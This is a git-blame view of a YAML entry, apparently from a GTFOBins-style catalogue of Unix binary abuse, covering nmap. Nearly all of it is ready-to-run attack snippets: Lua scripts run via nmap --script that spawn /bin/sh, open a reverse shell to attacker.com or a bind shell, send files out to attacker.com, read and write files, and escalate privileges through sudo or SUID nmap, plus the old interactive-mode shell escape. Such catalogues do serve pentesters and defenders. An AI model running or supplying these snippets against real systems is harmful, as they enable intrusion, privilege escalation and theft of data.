2018-08-17 17:16:09 +02:00
|
|
|
---
|
|
|
|
functions:
|
2018-10-05 19:55:38 +02:00
|
|
|
shell:
|
2018-08-23 17:57:26 +02:00
|
|
|
- description: Input echo is disabled.
|
2018-08-19 09:52:24 +02:00
|
|
|
code: |
|
2018-08-19 12:20:37 +02:00
|
|
|
TF=$(mktemp)
|
|
|
|
echo 'os.execute("/bin/sh")' > $TF
|
|
|
|
nmap --script=$TF
|
2018-12-24 01:48:13 +01:00
|
|
|
- description: The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.
|
|
|
|
code: |
|
|
|
|
nmap --interactive
|
|
|
|
nmap> !sh
|
2018-10-05 19:55:38 +02:00
|
|
|
non-interactive-reverse-shell:
|
2018-08-23 19:29:50 +02:00
|
|
|
- description: Run ``nc -l -p 12345`` on the attacker box to receive the shell.
|
|
|
|
code: |
|
|
|
|
export RHOST=attacker.com
|
|
|
|
export RPORT=12345
|
|
|
|
TF=$(mktemp)
|
|
|
|
echo 'local s=require("socket");
|
2019-01-29 14:25:16 +01:00
|
|
|
local t=assert(s.tcp());
|
|
|
|
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
|
|
|
|
while true do
|
|
|
|
local r,x=t:receive();local f=assert(io.popen(r,"r"));
|
|
|
|
local b=assert(f:read("*a"));t:send(b);
|
|
|
|
end;
|
|
|
|
f:close();t:close();' > $TF
|
2018-08-23 19:29:50 +02:00
|
|
|
nmap --script=$TF
|
2018-10-05 19:55:38 +02:00
|
|
|
non-interactive-bind-shell:
|
2018-08-23 19:29:50 +02:00
|
|
|
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
|
|
|
code: |
|
|
|
|
export LPORT=12345
|
|
|
|
TF=$(mktemp)
|
|
|
|
echo 'local k=require("socket");
|
2019-01-29 14:25:16 +01:00
|
|
|
local s=assert(k.bind("*",os.getenv("LPORT")));
|
|
|
|
local c=s:accept();
|
|
|
|
while true do
|
|
|
|
local r,x=c:receive();local f=assert(io.popen(r,"r"));
|
|
|
|
local b=assert(f:read("*a"));c:send(b);
|
|
|
|
end;c:close();f:close();' > $TF
|
2018-08-23 19:29:50 +02:00
|
|
|
nmap --script=$TF
|
2018-10-05 19:55:38 +02:00
|
|
|
file-upload:
|
2018-08-23 19:29:50 +02:00
|
|
|
- description: Send a file to a TCP port. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
|
|
|
|
code: |
|
|
|
|
export RHOST=attacker.com
|
|
|
|
export RPORT=12345
|
|
|
|
export LFILE=file_to_send
|
|
|
|
TF=$(mktemp)
|
|
|
|
echo 'local f=io.open(os.getenv("LFILE"), 'rb')
|
2019-01-29 14:25:16 +01:00
|
|
|
local d=f:read("*a")
|
|
|
|
io.close(f);
|
|
|
|
local s=require("socket");
|
|
|
|
local t=assert(s.tcp());
|
|
|
|
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
|
|
|
|
t:send(d);
|
|
|
|
t:close();' > $TF
|
2018-08-23 19:29:50 +02:00
|
|
|
nmap --script=$TF
|
2018-10-05 19:55:38 +02:00
|
|
|
file-download:
|
2018-08-23 19:29:50 +02:00
|
|
|
- description: Fetch remote file sent to a local TCP port. Run `nc target.com 12345
|
|
|
|
< "file_to_send"` on the attacker box to send the file.
|
|
|
|
code: |
|
|
|
|
export LPORT=12345
|
|
|
|
export LFILE=file_to_save
|
|
|
|
TF=$(mktemp)
|
|
|
|
echo 'local k=require("socket");
|
2019-01-29 14:25:16 +01:00
|
|
|
local s=assert(k.bind("*",os.getenv("LPORT")));
|
|
|
|
local c=s:accept();
|
|
|
|
local d,x=c:receive("*a");
|
|
|
|
c:close();
|
|
|
|
local f=io.open(os.getenv("LFILE"), "wb");
|
|
|
|
f:write(d);
|
|
|
|
io.close(f);' > $TF
|
2018-08-23 19:29:50 +02:00
|
|
|
nmap --script=$TF
|
|
|
|
file-write:
|
|
|
|
- code: |
|
|
|
|
TF=$(mktemp)
|
|
|
|
echo 'lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);' > $TF
|
|
|
|
nmap --script=$TF
|
|
|
|
file-read:
|
|
|
|
- code: |
|
|
|
|
TF=$(mktemp)
|
|
|
|
echo 'lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);' > $TF
|
|
|
|
nmap --script=$TF
|
2018-10-05 19:55:38 +02:00
|
|
|
sudo:
|
2018-08-23 17:57:26 +02:00
|
|
|
- description: Input echo is disabled.
|
2018-08-19 09:52:24 +02:00
|
|
|
code: |
|
2018-08-19 12:20:37 +02:00
|
|
|
TF=$(mktemp)
|
|
|
|
echo 'os.execute("/bin/sh")' > $TF
|
|
|
|
sudo nmap --script=$TF
|
2018-12-24 01:48:13 +01:00
|
|
|
- description: The interactive mode, available on versions 2.02 to 5.21, can be used to execute shell commands.
|
|
|
|
code: |
|
|
|
|
sudo nmap --interactive
|
|
|
|
nmap> !sh
|
2018-10-05 19:55:38 +02:00
|
|
|
limited-suid:
|
2018-08-23 17:57:26 +02:00
|
|
|
- description: Input echo is disabled.
|
2018-08-19 09:52:24 +02:00
|
|
|
code: |
|
2018-08-19 12:20:37 +02:00
|
|
|
TF=$(mktemp)
|
2018-08-24 00:45:07 +02:00
|
|
|
echo 'os.execute("/bin/sh")' > $TF
|
2018-08-19 12:20:37 +02:00
|
|
|
./nmap --script=$TF
|
2018-08-17 17:16:09 +02:00
|
|
|
---
|